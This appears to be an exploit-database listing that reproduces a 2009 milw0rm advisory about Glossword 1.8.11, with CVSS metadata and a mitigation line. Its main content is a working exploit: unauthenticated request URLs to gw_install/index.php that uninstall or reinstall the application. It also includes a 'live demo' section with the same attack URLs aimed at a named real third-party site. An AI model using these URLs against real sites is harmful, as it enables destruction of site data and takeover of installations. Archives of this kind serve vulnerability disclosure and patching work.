header-logo
Suggest Exploit
vendor:
Glossword
by:
Evil-Cod3r
7,5
CVSS
HIGH
Uninstall/install Script Vulnerability
20
CWE
Product Name: Glossword
Affected Version From: 1.8.11
Affected Version To: 1.8.11
Patch Exists: Yes
Related CWE: N/A
CPE: a:glossword:glossword:1.8.11
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

Glossword Version 1.8.11 (Uninstall/install) Script Vlun

A vulnerability exists in Glossword Version 1.8.11 which allows an attacker to uninstall or install the script by accessing the URL http://www.Site.com/path/gw_install/index.php?arg[il]=english&arg[target]=uninstall or http://www.Path.com/path/gw_install/index.php?arg[il]=english&arg[target]=install respectively.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the software to the latest version.
Source

Exploit-DB raw data:

#####################################################
#----------------------------- Evil-Cod3r -------------------------------#                                      
####################################################
==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                &n bsp;           

==============================================================================
        [»] ~ Note : n0 Friends =<
==============================================================================
        [»] Glossword Version 1.8.11 (Uninstall/install) Script Vlun
==============================================================================

    [»] Script:             [ Glossword Version 1.8.11 ]
    [»] Language:           [ PHP ]
    [»] Download:           [ http://code.google.com/p/glossword/downloads/list ]
    [»] Founder:            [ Evil-Cod3r <IE7@Windowslive.com - Xky@hotmail.com> ]
    [»] Gr44tz to:          [ The G0bl!n - v4-Team.Com members - Qabandi - Fl!x-Os - Mr.SaFa7 ]
    [»] Team:               [ v4-Team ]
    [»] SiteWeb:            [ Visit - v4-Team.Com - Creativexploit.Com ]
    [»] Price:              [ Free ]

###########################################################################

===[ Exploit To Uninstall The Script  ]===   
   
    [»] http://www.Site.com/path/gw_install/index.php?arg[il]=english&arg[target]=uninstall
   
== [ Exploit To New installation The Script ] ==

    [»] http://www.Path.com/path/gw_instal l/index.php?arg[il]=english&arg[target]=install

===[ LIVE DEMO ]===   

        [»] http://www.dataord.com

        [»] Uninstall : http://www.dataord.com/gw_install/index.php?arg[il]=english&arg[target]=uninstall
        [»] installation  : http://www.dataord.com/gw_install/index.php?arg[il]=english&arg[target]=install


Author: Evil-Cod3r <-

###########################################################################

# milw0rm.com [2009-07-09]

Navigation

Suggest Exploit

Services By CQR